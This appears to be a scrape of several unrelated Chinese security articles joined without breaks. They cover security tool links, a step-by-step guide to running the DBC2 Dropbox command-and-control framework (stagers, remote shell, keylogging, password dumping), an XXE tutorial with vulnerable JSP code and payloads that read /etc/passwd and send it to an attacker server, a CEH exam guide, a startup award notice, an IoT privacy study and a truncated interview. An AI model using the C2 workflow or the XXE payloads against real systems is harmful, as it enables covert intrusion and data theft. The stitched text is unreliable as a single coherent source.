本文作者:i春秋签约作家——夏之冰雪

恩,首先我分享国内top 3的最重要途径:

1. i春秋学院课程,里面有大量的精品课程,值得各阶段的人去学习。

2. i春秋论坛,恩,当你看到这篇帖子时,充分说明这个途径你已经掌握了。

3. i春秋各类qq群,一个人是寂寞的,一群人的学习和分享才会有基情。

除了top3,还有没有其他的途径呢?

对于新人而言,除了将安全领域的知识学扎实,还要尽量多的玩一玩各种安全工具,正所谓玩的6了,自然就会成长。

可以通过很多渗透集成框架,进行深入学习,很多框架或者操作系统集成了多款安全工具。

比如kali,尝试对kali的所有工具做研究,肯定会丰富自己的知识。

再比如,有这么一款工具——PentestBox,是一款Windows平台下预配置的便携式开源渗透测试环境。可以让我们很舒适的在windows下用很多工具,包括:

1. sqlmap

数据库注入检测神器,应该不用介绍了

2. Burp Suite

web请求分析及攻击工具

3. Commix

命令注入工具,蛮小巧精致的,一旦发现命令注入,让你非常舒适的“可视化控制”对方。

4. dotdotpwn 

模糊遍历网站风险目录,还可以解析* NIX passwd文件提取用户的主文件夹和搜索不同的常见文件的组合。

5. fimap

一款本地及远程的文件包含漏洞检测工具,集成了google语法搜索,对于我们围墙里的孩子,用起来比较尴尬。

6. golismero

开源的Web扫描器,它不但自带不少的安全测试工具,而且还可导入分析市面流行的扫描工具的结果,比如Openvas,Wfuzz, SQLMap, DNS recon等,并自动分析。

7. jSQL

一款Java开发的轻量级远程服务器数据库注入漏洞测试工具。

不过有了sqlmap,这个用处我觉得一般。

8. nikto

网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs.

9. wpscan

wordpress安全检测神器,推荐。

10. 等等

由于集成了很多工具,所以体积有些大,不过也是值得下载的。下载下来不需要安装,所有依赖pentestbox都尽可能装好了,默认情况下,我们只需要解压,就可以开始安全工具测试之旅了。

官网:https://tools.pentestbox.org/

由于下载可能较大,提供一个百度网盘地址:

https://pan.baidu.com/s/1hrLTZzI

再给一个网址:

https://linuxsecurity.expert/security-tools/top-100/

这里面集成了很多出名的安全工具,强烈推荐。

经常关注github上面的安全项目,有些项目作者会持续更新的,这类项目会根据最新的安全漏洞进行持续跟踪和升级,方便我们使用,比如:

ssl漏洞自动扫描

https://github.com/hahwul/a2sv

学着自己搜集一些安全咨询网站和blog,进行rss订阅。如果太懒,也可以看看别人的,比如有些人会汇总每日安全动态:

https://kevien.github.io/

大家都有什么好的学习研究途径,有哪些比较好的网址、项目,欢迎提出来。

以上,仅抛砖引大佬们的玉。

2017-08-31 20:38  追加:

android安全,有人专门收录整理了详细的资料,包括:

android 在线分析大全、动态/静态分析工具集、app漏洞扫描系列、fuzz测试、漏洞汇总等。

地址(强烈推荐):https://github.com/ashishb/android-security-awesome

而对于php安全,也有很多好用的开源工具值得研究:

https://github.com/ezyang/htmlpurifier

https://github.com/psecio/iniscan

https://github.com/defuse/php-encryption

https://github.com/jenssegers/optimus

总之,不要只局限于中文资料,和exe工具,要多看看github,github上面有非常多值得学习的安全工具。

当然,别忘了分享到论坛里哦~

许多企业都将DropBox作为他们的共享和数据托管工具。因此,向DropBox服务器发送的流量通常会被限制或归类为恶意域。但DropBox的功能可能被一些恶意用户所利用,并将其作为C&C服务器来使用。

这可以通过DropBoxC2这款工具来实现,该工具使用DropBox API与其建立通信,由于它完全在内存中运行,并且流量被加密,因此难以被发现。

DropboxC2控制器安装

git clone https://github.com/Arno0x/DBC2 dbc2
cd dbc2
pip install -r requirements.txt
chmod +x dropboxC2.py

使用DropBox功能将其作为C&C服务器

因为两者间的通信是通过DropBox API实现的,因此我们首先需要来创建一个新的应用程序来生成API密钥。

使用DropBox功能将其作为C&C服务器

为了避免后续使用的麻烦,我们直接在config.py文件(defaultAccessToken参数)中输入API密钥。这样,就不需要在每次启动DBC2时重复插入密钥了。

使用DropBox功能将其作为C&C服务器

当DropBoxC2运行时,用户需要选择一个主密码,它将用于加密代理和控制器之间的所有数据。

使用DropBox功能将其作为C&C服务器

Modules和Stage需要在使用之前先发布在DropBox上:

publishStage dbc2_agent.exe 

使用DropBox功能将其作为C&C服务器

DropBox上将生成一个文件,并被XOR加密。

使用DropBox功能将其作为C&C服务器

DropBoxC2可以生成各种各样的stager,从简单的.bat文件到msbuild和sct文件,并可绕过AppLocker。从rubber ducky到macro,给予了红队多种利用场景的能力。

使用DropBox功能将其作为C&C服务器

使用以下命令生成stagers:

genStager oneliner default
genStager batch default

使用DropBox功能将其作为C&C服务器

使用DropBox功能将其作为C&C服务器

从那刻起stager将在目标主机上被执行,开始beacon和生成Agent ID值并与 beacon(信标)相关联。

使用DropBox功能将其作为C&C服务器

在DropBox上将生成两个文件,该文件将声明代理的状态以及要传递给目标的命令。这些文件的内容都是加密的,以保持通信的机密性。

使用DropBox功能将其作为C&C服务器

之后我们可以使用Agent ID来与目标交互并执行命令。

使用DropBox功能将其作为C&C服务器

DropBox C2还具有传输文件的功能,通过交互式shell执行PowerShell命令,可以从目标主机获取屏幕截图。它还支持键盘记录器功能。部分使用命令如下:

sendFile
getFile
shell
screenshot

使用DropBox功能将其作为C&C服务器

使用DropBox功能将其作为C&C服务器

使用DropBox功能将其作为C&C服务器

此外,还可以使用各种PowerShell模块来执行其他任务,如获取反向shell,转储密码散列或从内存中检索明文密码。

使用DropBox功能将其作为C&C服务器

或者,你也可以选择使用另外一个工具(DropBoxC2C),它也可以将DropBox作为C&C服务器来使用。但是它更简单,并没有提供DBC2的功能。

参考

https://github.com/Arno0x/DBC2

https://github.com/0x09AL/DropboxC2C

 *参考来源:pentestlab,FB小编 secist 编译,转载请注明来自FreeBuf.COM

前言:

与xml格式相关的web漏洞,流传比较广泛的共有 xpath注入、xml注入、soap注入、XXE四种,本文主要是分享XXE相关技术。Xml,是一种可扩展标记语言,属于标准通用标记语言的子集,跟html师出同门,html侧重于页面展示,xml侧重于存储和传输。

针对xml语言,要明白两个特性:合法性与合理性。所谓合法性,是指语法层面。比如xml标签严格区分大小写,xml文档必须有一个根元素等等。所谓合理性是指xml文档要有意义就必须满足一定的约束要求。在XML技术里,可以编写一个文档来约束一个XML文档的书写规范,这称之为XML约束。常用的约束技术XML DTD 和XML Schema。由于  schema 对常见的XXE攻击相关性不是太大,本文只探讨基于DTD约束的XXE攻击。下面分别讲解一下与XXE攻击相关的两个概念:1.DTD的声明2.实体

文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

DTD-声明

DTD 被声明于 XML 文档中:

源码:

<?xml version=”1.0″?>

<!DOCTYPE note [<!--定义此文档是 note 类型的文档-->

<!ELEMENT note (who,action,what)><!--定义note元素有四个元素-->

<!ELEMENT who (#PCDATA)><!--定义to元素为”#PCDATA”类型-->

<!ELEMENT action (#PCDATA)><!--定义from元素为”#PCDATA”类型-->

<!ELEMENT what (#PCDATA)><!--定义head元素为”#PCDATA”类型-->

]>

<note>

<who>I</who>

<action>LOVE</action>

<what>THE WORLD</what>

</note>

解析结果:

62197CB8-6E0C-4C01-843B-C18112340E67.png
【不支持外链图片,请上传图片或单独粘贴图片】

DTD可作为一个外部引用:

源码:

<?xml version=”1.0″?>

<!DOCTYPE note SYSTEM “note.dtd” >

<note>

<who>I</who>

<action>LOVE</action>

<what>THE WORLD</what>

</note>

note.dtd:

<!ELEMENT note (who,action,what)><!–定义note元素有四个元素–>

<!ELEMENT who (#PCDATA)><!–定义to元素为”#PCDATA”类型–>

<!ELEMENT action (#PCDATA)><!–定义from元素为”#PCDATA”类型–>

<!ELEMENT what (#PCDATA)><!–定义head元素为”#PCDATA”类型—>

解析结果:

62197CB8-6E0C-4C01-843B-C18112340E67.png
【不支持外链图片,请上传图片或单独粘贴图片】

加载外部DTD时有两种加载方式,一种为私有private,第二种为公告public

私有类型DTD加载:

<!ENTITY private_dtd STSTEM “DTD_location” >

公共类型DTD加载:

<!ENTITY public_dtd PUBLIC “DTD_name” “DTD_location” >

在公共类型DTD加载的时候,首先会使用DTD_name来检索,如果无法找到,则通过DTD_location来寻找此公共DTD。

PCDATA 的意思是被解析的字符数据,有PCDATA标志的字符 会被当作xml标记来对待,而实体会被展开。但是被解析的字符数据不应当包含任何 &、< 或者 > 字符,需要使用相应的实体编码 &amp;、&lt; 以及 &gt; 来替换它们。

CDATA 的意思是字符数据,有CDATA标志的字符不会当作标记来对待,比如&等特殊字符只会被当作“&”本身,而不是特殊的标记,通过&引用的实体自然也不会被展开。

DTD – 实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量,本质上实体是对数据的引用,实体可在内部或外部进行声明,由于在xml1.0标准里,DTD可引用外部实体(entity),如果外部实体可被控制,则可能产生文件读取、dos、ssrf等漏洞。

XML中实体类型,大致有下面几种:

  • 字符实体
  • 内部实体(命名实体)
  • 外部实体
  • 参数实体

(除参数实体外,其它实体都以字符&开始,实体名,以字符;结束,与xxe相关的主要是外部实体与参数实体。

字符实体:对于字符实体,我们可以用十进制格式(&#nnn;,其中 nnn 是字符的十进制值)或十六进制格式(&#xhhh;,其中 hhh 是字符的十六进制值) 比如&#x25;表示%

内部实体:又称为命名实体,内部实体只能声明在DTD或者XML文件开始部分(<!DOCTYPE>语句中)。

<?xml version=”1.0″ encoding=”utf-8″?>

<!DOCTYPE   root  [ <!ENTITY a "hello”> ]>

<root>&a;</root>

外部实体:

外部实体申明:<!ENTITY 实体名 SYSTEM “URI/URL”>  

外部实体引用:&实体名;

<?xml version=”1.0″ encoding=”utf-8”?>

<!DOCTYPE root       [<!ENTITY xxe SYSTEM “本地或远程文件" > ]  >

<root>&xxe;</root>

外部实体 通过在DOCTYPE头部标签中包含SYSTEM 关键字  ,这些定义的’实体’能够访问本地或者远程的内容。比如,下面的XML文档样例就包含了XML ‘实体’。XML外部实体 ‘a’ 被赋予的值为:file://etc/passwd。在解析XML文档的过程中,实体’a’的值会被替换为URI(file://etc/passwd)内容值。 关键字’SYSTEM’会告诉XML解析器,’a’实体的值将从其后的URI中读取。有了XML实体,关键字’SYSTEM’会令XML解析器从URI中读取内容,并允许它在XML文档中被替换。因此,攻击者可以通过实体将他自定义的值发送给应用程序,然后让应用程序去呈现。 简单来说,攻击者强制XML解析器去访问攻击者指定的资源内容(可能是系统上本地文件亦或是远程系统上的文件)。

<?xml version=“1.0” encoding=“utf-8” ?>

<!DOCTYPE root [ <!ENTITY a SYSTEM “file:///etc/passwd”>  ]>

<root>&a;</root>

参数实体:与一般实体相比它以字符(%)开始,以字符(;)结束,并且只有在DTD文件中才能在参数实体声明的时候引用其他实体。

参数实体申明:<!ENTITY % 实体名 “实体内容”>

参数实体引用:%实体名;

<?xml version=”1.0″ encoding=”utf-8″?>

<!DOCTYPE note <!ENTITY % remote SYSTEM “攻击者远程服务器上的xml文件">

       %remote;

]>

<root>&b;</root>

在常规的攻击中有两种情况有用到参数实体1.读取的文件包含特殊字符 2.在 XXE 攻击没有回显的情况下,可以利用参数实体来获取回显数据。

XXE攻击方式

针对不同的语言的xml解析器支持不同的协议,因此会衍生出不同的攻击方式。

5CE63E67-0B0B-4941-AC8F-B47109377DB2.png
【不支持外链图片,请上传图片或单独粘贴图片】

通常会利用XXE基于xml解析器支持的file和http协议,来进行可以实现任意文件读取和ssrf两种攻击

以java为例,在java中解析xml文件有三种常见的方式:1.dom  2.sax   3.dom4j.

简单来说  dom 是将文件一次性的加载到内存中   以dom文档的形式  展示,   sax是将文件一行一行的加载到内存中   直接处理,而dom4j需要加载外部jar包,综合性能最高。

Dom

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

factory.setValidating(true);

DocumentBuilder builder = factory.newDocumentBuilder();

Document doc = builder.parse(“src/demo.xml”);

Sax

SAXParserFactory factory = SAXParserFactory.newInstance();

SAXParser parser = factory.newSAXParser();

MyHandler dh = new MyHandler();

parser.parse(“src/demo.xml”, dh);

DOM4J

SAXReader reader = new SAXReader()

Document doc = reader.read(“src/demo.xml”);

以DOM为例,进行代码演示:

一.读取文件

Xxe1.jsp

1.有回显的任意文件读取

<%@ page contentType=“text/html; charset=UTF-8″ %>

<%@ page import=“org.w3c.dom.*, javax.xml.parsers.*” %>

<%@ page import=“org.xml.sax.InputSource” %>

<%@ page import=“java.io.StringReader” %>

<html>

<head><title>XXE </title>

</head>

<body>

<%

    String data = request.getParameter(“data”);

    String tmp  = “”;

    if (data != null) {

    try {

           DocumentBuilderFactory docFactory = DocumentBuilderFactory.newInstance();

           DocumentBuilder docBuilder = docFactory.newDocumentBuilder();

           Document doc = docBuilder.parse(new InputSource(new StringReader(request.getParameter(“data”))));

           NodeList RegistrationNo = doc.getElementsByTagName(“foo”);

           tmp = RegistrationNo.item(0).getFirstChild().getNodeValue();

} catch (Exception e) {

                out.print(e);

            }

    }

%><%= tmp  %>

</body>

</body>

</html>

Payload:<?xml version=”1.0″  ?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

22C3F35C-5A3F-4BD4-9C9D-186BC9394AFE.png
【不支持外链图片,请上传图片或单独粘贴图片】

2.无回显得文件读取

Xxe2.jsp

<%@ page contentType=“text/html; charset=UTF-8″ %>

<%@ page import=“org.w3c.dom.*, javax.xml.parsers.*” %>

<%@ page import=“org.xml.sax.InputSource” %>

<%@ page import=“java.io.StringReader” %>

<html>

<head><title>XXE </title>

</head>

<body>

<%

    String data = request.getParameter(“data”);

    String tmp  = “”;

    if (data != null) {

    try {

           DocumentBuilderFactory docFactory = DocumentBuilderFactory.newInstance();

           DocumentBuilder docBuilder = docFactory.newDocumentBuilder();

           Document doc = docBuilder.parse(new InputSource(new StringReader(request.getParameter(“data”))));

           NodeList RegistrationNo = doc.getElementsByTagName(“foo”);

           tmp = RegistrationNo.item(0).getFirstChild().getNodeValue();

} catch (Exception e) {

               

            }

    }

%><%= “hello”  %>

</body>

</body>

</html>

Payload:

<?xml version=“1.0” ?>

<!DOCTYPE   note [

<! ENTITY % file SYSTEM  “file:///etc/passwd”>

<!ENTITY %  remote SYSTEM  “攻击者远程服务器上的xml文件”>

%remote;

%all;

]>

<root>&send;</root>

攻击者远程服务器上的xml文件:

<!ENTITY % all “<!ENTITY send SYSTEM ‘远程服务器URL/%file;’ >”>

若是攻击成功会在远程服务器的日志中看到:

0:0:0:0:0:0:0:1 – - [24/Aug/2017:23:51:29 +0800] “GET /要读取file的内容 HTTP/1.1″ 200 88

二.ssrf

针对ssrf的攻击 主要是进行内网端口探测和执行只通过http就可以实现的攻击,比如strust2命令执行漏洞简单通过一次http请求就可以成功实现攻击。

1.探测端口

要发送的payload:

<?xml version=”1.0” encoding=”UTF-8”?>  

<!DOCTYPE A SYSTEM  ”内网地址:端口”  >

<A></A>

不同的xml解析器针对这种情况会有不同的不反应,因此不能一概而论。比如有一些XML解析器处理时 若该内网地址的端口属于监听状态 则服务器的response时间 比端口关闭的response时间要漫长很多,这时便可以通过返回的时间来判断端口是否处于开放状态。当有回显得时候 也可以直接根据 回显得内容来判断 内网地址的存活以及端口开放与否,个人感觉这种攻击有些鸡肋。

2.struts2攻击

Payload 

<?xml version=”1.0” encoding=”UTF-8”?>  

<!DOCTYPE A SYSTEM  ”内网地址+相关漏洞的payload”  >

<A></A>

若是内网的某台服务器存在该漏洞,则直接可以执行命令了。

如何发现XXE:

笔者看了很多分析XXE的文章,很多人在谈到如何发现XXE的时候,几乎都是千篇一律的说到:三部曲:1.检测XML是否会被解析2.检测服务器是否支持外部实体3.如果上面两步都支持,那么就看能否回显,

在这里 笔者提出一个自己的观点 欢迎大家谈论:我认为针对黑盒渗透的特性, 测试者没法知道自己的任何发送请求传到服务器时,有没有进入到xml解析器里。比如 在客户端明明发送的是json格式的数据但是实际传输到服务器里了,却进入到xml解析器里了(这篇文章就是这种情况:https://blog.netspi.com/playing-content-type-xxe-json-endpoints/)。或者当服务端没有任何回显 时,这种情况也不知道  服务端是否解析  了XML 格式数据。因此笔者的方法是直接在doc文档中通过关键字system 去访问一个外网地址,通过观察DNSLOG来判断服务器是否解析了客户端的请求。

<?xml version=”1.0” encoding=”UTF-8”?>  

<!DOCTYPE A SYSTEM”dnslog地址”  >

<A></A>

若是服务器解析了,则会在DNSLOG中看到一下请求,这就证明了存在XXE漏洞。

8F1EC212-5E3C-4478-A4EF-FB1270B80C60.png
【不支持外链图片,请上传图片或单独粘贴图片】

预防方式

正所谓一切漏洞来源揭示由于用户的恶意输入,XXE之所以会发生 是因为中间件的xml解释器对恶意用户的输入进行了解析所导致的,通常xml解释器默认是含有xxe漏洞的。可以看出漏洞之所以发生是由于xml解析器允许解析外部实体,因此从根源上预防XXE就是要保证解析器不支持外部实体的引用,针对不同的语言有不同禁止解析外部实体的方式。或者从WAF黑名单的思路来预防 ,可以禁止客户传入的一些与XXE有关的关键字,比如可以一次性的将一下4个关键字加入到WAF里DOCTYPE、ENTITY、SYSTEM、PUBLIC。

资料来源:

1.http://www.w3cschool.cn/xml    

2.http://www.w3cschool.cn/dtd   

3.http://bobao.360.cn/learning/detail/3841.html

4.http://blog.csdn.net/u011721501/article/details/43775691

2017年8月21我通过了CEH考试并于23日获得认证,整个申请考试和备考过程中遇到一些问题,通过摸索终于通关。网上对于CEH认证的中文介绍少,没看到详细攻略。本文简述CEH考证相关问题,给需要的朋友参考。内容原创,欢迎转载,请保留作者信息。

1  CEH认证是什么

 CEH认证

在911事件发生后,Jay Bavisi先生发现了美国安全机构缺乏能够利用 网络工具和资源来阻止网络攻击能力的这个商机,成立了国际电子商务顾问委员会EC-Council, 提供信息安全培训和认证计划。该组织的第一个信息安全计划,即认证的道德黑客CEH推出后 很快获得了美国国防部DoD,国家安全局(NSA)和国家安全系统委员会(CNSS)在内的美国政府机构认可。被列入国防部DoD 8570.01-M 的安全基准认证(Baseline Certifications) 

 Jay Bavisi先生

EC Council创始人Jay Bavisi 先生,我通过CEH认证以后,申请加了他的linkedin

美国DoD 8750.01安全基准认证列表

美国DoD 8750.01安全基准认证列表

CEH认证满足ANSI / ISO / IEC 17024标准的要求。CEH认证被国际上认为是顶级热门安全证书:

http://www.tomsitpro.com/articles/information-security-certifications,2-205.html  ;

http://resources.infosecinstitute.com/7-top-security-certifications-you-should-have/#gref

http://www.itcareerfinder.com/brain-food/blog/entry/10-hot-cyber-security-certifications-for-2017.html  

对此也有一些争议,有观点认为 黑客是不需要被认证的,另外有人 觉得CEH收费过高,内容与价值不匹配,而且其官网曾经被黑

至于之前传说CEH认证者会被FBI备案之类说法,并没有在EC Council官网以及维基百科等网站上看到确实信息,已 提供资料请人修改了百度百科词条。其实如果真有备案的话CISSP,CISM这种信息也少不了会被收集的。普通民众大可放心去获取认证,至少我登记申请CEH考试后去美国旅游出入境没有遇到过问题。报名考试时只是要求提供姓名,邮件地址,工作简历等,不需要 PII信息(身份证,护照等)。

2 CEH 认证考什么,多少钱,在哪里考

2.1 考试大纲

考试大纲

考试大纲

2.2 考试方式:

考试类型:125道选择题,无实际操作 。

考试语言:英文考试(无中文 可选)。

考试时间:240分钟 加30分钟非英语地区的延长 时间。

考试编号:312-50 (ECC EXAM), 312-50 (VUE)。

及格分数:官网不提供 具体最低及格分数

2.3 费用

考试费950美元

不参加培训,自学考试申请费100美元

后续年费 80美元

2.4 考试地点

多地有考点,一个沈阳 市的朋友身边就有两个考点提供312-50考位。我 在上海多个考点中选的是SOHO复兴广场Pearson VUE,地铁 新天地站旁边很方便。

CEH  考试地点

在Pearson VUE考需要单独注册ECC 的账户,与之前其他 机构的考试(如ISC2),不是同一个账户,请尽早注册。

3 CEH 认证考试申请攻略

CEH考证认证过程中,比较麻烦的是申请考试流程。取得CEH认证有两个途径,一是参加官方认可培训后参加考试, 另一个方式不参加官方培训,通过自学参加考试,需验证申请人两年以上的安全从业经验。

3.1 提交考试申请:

 https://cert.eccouncil.org/Exam-Eligibility-Form.html. 这里填写信息,会有邮件联系你,要求提供以下信息:

(1)Duly filled in Exam Eligibility Application Form (Attached)  申请表

(2)Identification proof and updated resume 身份证明和简历 (注意不是身份证护照等)

(3)Payment confirmation code/receipt   考试费缴费证明

(4)You would also need to pay USD100 towards Eligibility Application fee. (申请费不退款)

分别详细说明,各相关资料的提交

3.2 EC-Council Exam Eligibility Application Form 申请表

见填写样张,第二页里的身份证明(Proof of  Identify),不要提供护照,身份证,我给的是公司开的中英文 对照的在职证明(Employment Verification Letter)网上找个模板,走 流程请HR签字盖章,我同时也提供了工牌和名片的照片。第二页 里也需要提供上司姓名和邮件地址,主办方会按照邮件地址 给你填写的上司发邮件核实信息。请提前 与上司沟通好。 

申请表

3.3 一份英文简历

我直接把linkedin上的copy出来 ,是非常简单的一个简历。

英文简历

3.4 缴费 

注意有坑

这里注册一个账户,并缴费,此网站登录页面有个人机验证,调用了谷歌的资源 可能需要翻墙。

缴费页面

3.5 验证通过后约考

验证通过后,会有邮件提供信息: Your eligibility application process is now complete. Your VUE Eligibility code for the CEH Exam is EC777F2XXXXX  and the Exam voucher code is EC0380XXXXX  这个信息一年内有效。2.4节中程建立的Pearson  UVE的ECC账户中上填写上述,约考位,参加考试。

3.6 考试通过后事项

考试通过后,主办方audit发邮件要求 我提供教育背景和培训中心名称:

1. What is your educational background? Are you currently working? Do you have any experience in IT security?

2. Where did you attend your CEH training? Kindly name the training Center?

我把前面的简历,审核表以及通过审核的邮件,打包重新发给他们一次,告诉他们我是自学考试 。得到回复是: Your exam results have been released from our Audit dept. You will receive an email notification from ” [email protected]” with your aspen account details that carry your digital certificate.

也就是说,证书会在https://aspen.eccouncil.org/  下载,所以还需要一个aspen的账户。这个aspen账户我事先 建好了,邮件告诉了他们用户名。如果没申请过 此账户的,也许会配一个,没尝试过。 注意 ,aspen注册时候,网站也 调用 了谷歌资源,可能要翻墙:

证书下载

也就是说,考试这个证书,需要三个地方注册

交钱:https://store.eccouncil.org/

约考: http://www.pearsonvue.com/eccouncil/

下载证书: https://aspen.eccouncil.org/

维持证书,需提供继续教育学分 EC-Council Continuing Education Credits (ECE),每三年必须 满足120学分。并需要每年支付80美元年费。  官网提供了一些ECE的例子:https://cert.eccouncil.org/ece-policy.html

4 CEH有哪些认证复习资料?

复习书籍有以下三本  

复习书籍

CEH Certified Ethical Hacker All-in-One Exam Guide, Third Edition 书末有软件下载,里面有练习题

 复习书籍

CEH v9: Certified Ethical Hacker Version 9 Study Guide

复习书籍

CEH v9: Certified Ethical Hacker Version 9 Practice Tests

 复习书籍

官方培训的ppt 推荐看看,不过不是备考必须

三本书配套的练习题刷一下,每个题目知识点都搞明白,Nmap CheatSheet 背一下 。

以上资料请自行网上搜索或采购。

考试论坛

http://www.techexams.net/forums/ec-council-ceh-chfi/

考试资料参考网站  

https://vceplus.com/

https://www.examcollection.com/

http://www.aoowe.com/

http://devcertguru.com/certifications/

http://www.aiotestking.com/

5 其他事项

未尽内容,请参见EC Council官网和维基百科等相关信息,祝参加CEH认证 考的朋友顺利。

*本文作者:juney(携程 雷兵);转载请注明来自 FreeBuf.COM

 为全面贯彻落实国家和北京市关于“大众创业、万众创新”的精神和要求,深入实施《北京高校高质量就业创业计划》,切实对学生创业给予支持,树立大学生创业典型,营造良好创新创业氛围, 从2017年4月至7月,北京市教育委员会组织开展了2017年北京地区高校大学生优秀创业团队评选工作。来自50所高校报送的414支创业团队参加了此次评选。

经专家复评,遴选出180支团队参加最终的现场答辩,经过激烈的角逐,评审专家们最终评选出150支优秀创业团队,其中一等奖31个,二等奖50个,三等奖69个。

来自北京大学的顶级信息安全研究团队“悬镜”,凭借在人工智能和攻防对抗领域深厚的前沿技术积累和创新的商业模式获得了现场评审专家的一致认可,最终以全市总排名第四的优秀成绩获得本次比赛一等奖。

XUANJ.png

“悬镜”(www.xmirror.cn)是北京安普诺信息技术有限公司旗下的专业云主机安全品牌,“悬镜安全实验室”是隶属安普诺的信息安全研究团队,2016年6月,实验室率先发布国内第一款基于深度学习技术的Web威胁检测引擎XMAZE,在SQL注入攻击检测方面就,无论是精确率还是召回率,较同类安全产品皆有大幅度提升!

安普诺(www.anpro-tech.com),由北京大学网络安全白帽子团队主导创立,核心成员来自于北京大学和国内顶级安全厂商。是国内首家专注于[云+端]一站式安全加固解决方案的专业厂商,通过领先的产品与服务,努力为企业、电商、O2O厂商、开发者、政府客户和高校等打造可信的业务安全闭环生态。2016年,互联网安全巨头“360企业安全集团”和自主可信方案提供商“山西百信”完成对安普诺的战略投资。

悬镜创始人张涛2012.9年-2015.7就读于北京大学软件与微电子学院信息安全系,曾获得“北京大学优秀毕业生”和“北京市优秀毕业生”光荣称号。

2015年9月就读于北京大学信息科学技术学院计算机软件与理论专业,专攻博士学位。读博期间不仅长期专注于人工智能和信息安全结合的跨领域学术研究,多次发表关于深度学习在Web安全对抗方面的前沿学术研究成果,还和北大信息安全实验室的一些师兄弟及校内信息安全爱好者一起创建云主机安全品牌悬镜和CTF战队“Xmirror”,多次代表北京大学参加国内CTF比赛并获得优异成绩。

你有没有想过,你家里所用的智能家电可能会暴露你的生活习惯和方式?

你有没有想过?你家里所用的智能家电可能会暴露你的生活习惯和方式?智能家电产生流量之中的元数据就足以让你暴露。

根据美国普林斯顿大学这个月出的一份研究报告所说,攻击者完全可以利用主动网络监控技术来收集IoT设备及其远程管理服务器之间交换的元数据。

即便通讯数据经由VPN加密,对于攻击者来说流量所泄露的元数据,也足以用来推断用户的很多生活细节了。

通过DNS请求,mac地址,流量发送模式可以检测到loT设备

IoT设备及远程服务器之间的所谓的“数据流(traffic flow)”导致了信息的泄露,基于不同的模式是很容易识别这些流量的。识别这些流量最简单的方式就是看他们的DNS请求,因为对于每种智能设备来说,他们的DNS的请求都是不同的。

你有没有想过,你家里所用的智能家电可能会暴露你的生活习惯和方式?

另外也可以通过识别流量中MAC地址前六位和传输率来检测智能设备。

实践表明这种攻击方式是可行的

为了证明这点,实验人员测试了以下7台loT设备,并且利用上述谈到的技术来识别设备主人的生活细节。

1.Sense Sleep Monitor 睡眠监控器

2.Nest Cam 室内安全摄像头

3.Amcrest 安全网络摄像机

4.Belkin WeMo 开关

5.TP-Link 路由器智能插口

6.Orvibo 智能WiFi插座

7.亚马逊 Echo

研究人员表示,他们可以通过亚马逊 Echo 和 WiFi 设备活动情况来确定设备主人何时在家。

除此之外,研究人员还可以通过观察Sense睡眠监控器活跃度何时加强,就能确定设备主人何时入睡。因为当睡眠监控器对用户睡眠情况做必要的数据采集时,设备会更活跃。

研究人员还说,通过上面提到的方法还能检测用户何时离开家,因为Nest摄像头在用户离开家的时候也会开始变得活跃,仅在用户离开、激活摄像头的监控模式之后,设备才会定时向远程服务器上传拍下来的照片。

loT的“始终在线”真的好吗

普林斯顿的研究人员警告用户不要低估这种攻击,这是因为大多数的loT设备都是需要联网的,其中的一些设备的确也必须这样设计。(比如摄像头要联网才能将照的照片通过网络发送到用户手中)

在测试这7个设备的过程中,将设备断开网络连接,有3个停止工作,剩下4个虽然可以工作,其中的很多功能都被限制了。但大多数用户购买这些设备时,都是想使用它们的”完整版“的,所以用户会一直保持它们联网。

这对于攻击者来说,也留下了一些蛛丝马迹,可以让攻击者监视用户的家,并且可以悄悄地追踪他们家里的情况,这都是IoT设备产生的流量泄露的信息。

一个简单的缓解方法

你有没有想过,你家里所用的智能家电可能会暴露你的生活习惯和方式?

幸运的是,研究人员表示还是有一个简单的方法来防止用户被监视。

”我们的实验表明,流量伪装可以有效地减轻loT中智能设备中存在的隐私上的风险。”

流量伪装是指是在随机间隔内插入伪装的网络请求,这些请求可以隐藏用户真实的活动,并减少将隐私暴露于黑客的情况。

研究人员表示对于那些不需要音视频的智能设备,虚假流量最多只占用户正常带宽7.5 KB / s,对于需要音视频功能的智能设备,虚假流量需要的带宽为40 KB / s,这样的数字还是可以接受的。

我们希望消费者能更好地了解智能设备中的隐私缺陷,并鼓励制造商在设计之初就考虑到隐私问题。虽然我们提出伪装流量的解决方案还是比较实用和有效的,但还是需要ISP(互联网服务供应商)和其他机构在监管的提升,这样才能应对loT设备带来的隐私问题。

更多内容可以参见研究人员发表的文章《监控智能家居:加密IoT流量的隐私攻防》,本文由普林斯顿大学研究人员Noah Apthorpe,Dillon Reisman等人撰写。

其实现在的IoT问题正变得越来越严重,不光是隐私问题。大量IoT设备被用来发动DDoS攻击,最近来自卡巴斯基的一份研究就显示全球范围内有将近750万存在安全问题的摄像头和400万存在安全隐患的路由器连接到网络中。来自SANS Techonology研究机构的负责人Johannes B. Ullrich博士最近做了个实验,他把一台DVR暴露到互联网上2天,并记录所有恶意登录请求。

这台设备采用root:xc3511作为登录用户名和密码,发现在45小时内来自不同的IP尝试登录这台设备1254次。每2分钟就有人利用正确的身份凭证登录了这台DVR。

他随后进行了Shodan搜索,获取到592台攻击设备的相关信息,发现这些攻击设备主要来自TP-Link、AvTech、Synology和D-Link。不少攻击都是Mirai变种发动的。

*参考来源:bleepingcomputersecurityweek,FB小编Liki编译,转载请注明来自FreeBuf.COM


7月26日的下午,我们来到受访者欧建军的工作地点,是家外企,所以你总能看到楼里的人拿着文件,脚步匆匆。楼下日料店里也会瞥见有人小口酌饮,礼貌而沉默地品味美食。或是咖啡铺前两人聊聊琐事。他们喜欢工作的紧张感,也享受着生活、珍惜这种快节奏工作下忙里偷闲的欢愉感,在这里从事安全工作的欧建军亦是如此。

 

和之前受访中CSO一贯的严肃严谨的说话方式不同,他介绍完自己的英文名James后就兴奋地讲起刚旅行回来的经历:“骑马,滑草,住蒙古包…我在北方呆了4年第一次去大草原,那里的视野很开阔,很喜欢。”谈笑风生,生活里他热爱自由,而在工作中他评价自己“像一个大侠”就更是少见了。

 

